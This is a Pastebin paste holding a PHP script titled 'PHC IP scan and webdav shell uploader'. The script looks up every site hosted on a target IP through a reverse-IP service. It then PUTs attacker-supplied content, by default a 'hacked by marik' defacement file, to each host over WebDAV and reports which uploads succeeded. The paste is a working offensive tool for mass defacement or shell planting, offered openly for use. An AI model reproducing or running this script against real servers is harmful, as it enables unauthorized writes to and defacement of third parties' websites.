Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <center><font style="font-size:40px">PHC IP scan and webdav shell uploader</font><br /><br />
- <?php
- set_time_limit(0);
- error_reporting(0);
- echo '<form action="" method="post">
- Filename:<input name="nam" value="mav.txt"><br />
- Text:<br />
- <textarea name="isi" cols="50" rows="30">hacked by marik</textarea><br />
- Scan ip:<br />
- <input name="wd" value="60.172.12.2"><br />
- <input type="submit">
- </form>';
- $filename = $_POST["nam"];
- $ip = $_POST["wd"];
- $isi = $_POST["isi"];
- $ua = $_SERVER["HTTP_USER_AGENT"];
- $kl = curl_init('http://www.ip-adress.com/reverse_ip/'.$ip);
- $kla = array(
- CURLOPT_RETURNTRANSFER => 1,
- CURLOPT_USERAGENT => $ua);
- curl_setopt_array($kl, $kla);
- $html = curl_exec($kl);
- curl_close($kl);
- function getek($tag, $html, $strict=0)
- {
- $dom = new domDocument;
- if($strict==1)
- {
- $dom->loadXML($html);
- }
- else
- {
- $dom->loadHTML($html);
- }
- $dom->preserveWhiteSpace = false;
- $content = $dom->getElementsByTagname($tag);
- $out = array();
- foreach ($content as $item)
- {
- $out[] = $item->nodeValue;
- }
- return $out;
- }
- $haha = getek("td", $html);
- foreach($haha as $jojo)
- {
- $phc = trim($jojo);
- $naru = curl_init("http://".$phc);
- curl_setopt($naru, CURLOPT_RETURNTRANSFER, 1);
- $betol = curl_exec($naru);
- curl_close($naru);
- if($betol === false)
- {
- }
- else
- {
- //script webdav mula
- $taz = fopen("sementara.phc", "w+");
- fwrite($taz, $isi);
- fclose($taz);
- // Prepare the file we are going to upload
- $filepath = "sementara.phc";
- $filesize = filesize($filepath);
- $fh = fopen($filepath, 'r');
- // The URL where we will upload to, this should be the exact path where the file
- // is going to be placed
- $remoteUrl = $phc;
- // Initialize cURL and set the options required for the upload. We use the remote
- // path we specified together with the filename. This will be the result of the
- // upload.
- $ch = curl_init($remoteUrl ."/". $filename);
- // I'm setting each option individually so it's easier to debug them when
- // something goes wrong. When your configuration is done and working well
- // you can choose to use curl_setopt_array() instead.
- // Set the authentication mode and login credentials
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
- // Define that we are going to upload a file, by setting CURLOPT_PUT we are
- // forced to set CURLOPT_INFILE and CURLOPT_INFILESIZE as well.
- curl_setopt($ch, CURLOPT_PUT, true);
- curl_setopt($ch, CURLOPT_INFILE, $fh);
- curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- // Execute the request, upload the file
- $cek = curl_exec($ch);
- curl_close($ch);
- if($ip != null)
- {
- $cu = curl_init("http://".$phc."/".$filename);
- curl_setopt($cu, CURLOPT_RETURNTRANSFER, true);
- $res = curl_exec($cu);
- curl_close($cu);
- $che = strripos($res, "403");
- $che2 = strripos($res, "404");
- $che3 = strripos($res, "method not allowed");
- $che4 = strripos($res, "404");
- $che5 = strripos($res, "Not found");
- if($che or $che2 or $che3 or $che4 or $che5 > 1)
- {
- if($cek === false)
- {
- echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[failed]<br />";
- }
- else
- {
- $cr = curl_init();
- curl_setopt($cr, CURLOPT_URL, "http://".$phc."/".$filename);
- curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
- $respons = curl_exec($cr);
- $errno = curl_errno($cr);
- $error = curl_error($cr);
- $response = $response;
- $info = curl_getinfo($cr);
- $chek = $info['http_code'];
- curl_close($cr);
- if($chek > 400)
- {
- echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[failed]<br />";
- }
- else
- {
- echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[uploaded]<br />";
- }
- }
- }
- else
- {
- echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[Uploaded]<br />";
- }
- }
- else
- {
- }
- // Close the file handle
- fclose($fh);
- //script webdav tamat
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement